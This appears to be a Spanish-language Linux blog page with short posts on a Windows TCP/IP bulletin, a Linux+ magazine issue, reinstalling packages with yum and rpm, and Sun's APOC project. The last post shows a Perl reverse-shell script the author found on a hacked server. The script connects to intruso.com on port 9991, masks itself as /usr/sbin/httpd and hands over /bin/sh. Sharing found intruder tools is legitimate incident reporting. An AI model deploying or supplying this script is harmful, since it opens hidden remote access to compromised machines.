Microsoft Security Bulletin MS08-001 – Critical
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (941644)
Published: January 8, 2008
Revista Linux+ Enero 2008
Paulina Pyrowicz no envía información sobre el número de Enero de la revista Linux+ 01/2008.
El tema central de este número de Linux+ es Gráfica. En los DVD’s adjuntos encontraréis:
# openSuSE 10.3
# Mandriva 2008
# Qcad – Versión completa del programa para el diseño gráfico profesional
# Videotutorial: Cómo crear un videotutorial en GNU/Linux
También podréis leer los siguientes artículos:
Revolución gráfica en Linux: Conoce lo más reciente en los entornos gráficos
Blender 3D: Creamos gráficos tridimensionales
GraphicsView: Programación de gráficos en dos dimensiones
Chip Cell: Guía para la iniciación a la programación
Ndiswrapper: Conexiones inalámbricas en Linux
Cámaras digitales: Testeamos modelos más populares
Proyecto de escritorio Tango: Guía para la armonización de iconos
Cómo reinstalar una aplicación con Yum
Instalar en Yum es fácil: yum install programa . Pero reinstalar una que ya esté instalada no es evidente. No existe un comando tipo –force («yum install –force » o «yum reinstall» …) Así que hay que lidiar un poco con el venerable RPM:
# rpm -e –justdb –nodeps programa
# yum install programa
con la primera línea borramos la entrada de programa en la base de datos de RPM. Así, para Yum, esa aplicación (programa) ya no está instalada. No se quejará cuando le digamos que la reinstale.
APOC: el Active Directory de Linux, ¡por fin Open Source!
El proyecto APOC (A Point of Control) está basado en el producto Sun Desktop Manager, desarrollado originalmente por el equipo Sun Ray de Sun Microsystems, en un esfuerzo para ofrecer la capacidad de gestión centralizada el sistema Sun Java Desktop. En 2007, SUN decidió donar y promover APOC como un proyecto opensource al proyecto FreeDesktop.org, con el objetivo de construir una comunidad alrededor de este software y extender el uso de APOC al mayor número de aplicaciones y sistemas operativos posible. Finalmente, tras 8 meses de duro trabajo liderado por Alberto Ruiz, Sun publicó el código fuente de APOC usando una licencia dual CDDL/GPLv2.
APOC ofrece funcionalidades para gestionar de forma centralizada escritorios y aplicaciones de escritorio en grandes despliegues informáticos. Permite a los administradores de sistemas distribuir de forma segura entornos de escritorio open source correctamente configurados, y optimizados en función de las necesidades y privilegios de los usuarios, basándose en roles, grupos y hosts dentro de la organización.
Con APOC, cualquier administrador de sistemas puede crear y agrupar configuraciones en forma de perfiles para las aplicaciones open source más populares y desplegar esos perfiles en sus servidores LDAP, usando la jerarquía que ya tengan definida.
El código fuente, wiki, bugzilla y lista de distribución del proyecto ya están online en apoc.freedesktop.org
Herramientas de destrucción masiva
He encontrado un regalito mientras limpiaba uno de mis servidores …. Este script Perl (lo he limpiado y descifrado un poco para que se entienda mejor) se conecta contra intruso.com (logicamente otra máquina), al puerto 9991. Allí, con netcat a la escucha en ese puerto, recibe la shell inversa del servidor pirateado. En mi servidor, el proceso aparece como /usr/sbin/httpd. Angelitos…
#!/usr/bin/perl
use Socket;
#
$spread=»intruso.com»;
$port=»9991″;
$fake=»/usr/sbin/httpd»;
if ($ARGV[0]) {
$spread=$ARGV[0];
}
$proto = getprotobyname(‘tcp’) || die(«[x] Error: getprotobyname()nn»);
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die («[x] Error: Socket()n»);
if (!connect(SERVER, pack «SnA4x8», 2, $port, inet_aton($spread))) {
die(«[x] Failed!..n»);
}
if (!fork( )) {
$0=$fake.»�»x16;;
open(STDIN,»>&SERVER»);
open(STDOUT,»>&SERVER»);
open(STDERR,»>&SERVER»);
system(«echo [x] Uname ; uname -a ; echo ; echo [x] Uptime ; uptime ; echo ; echo [x] Id ; id ; echo»);
#
exec {‘/bin/sh’} $fake . «�» x4;
#
exit(0);
}
print «[x] shell ejecutada…n»;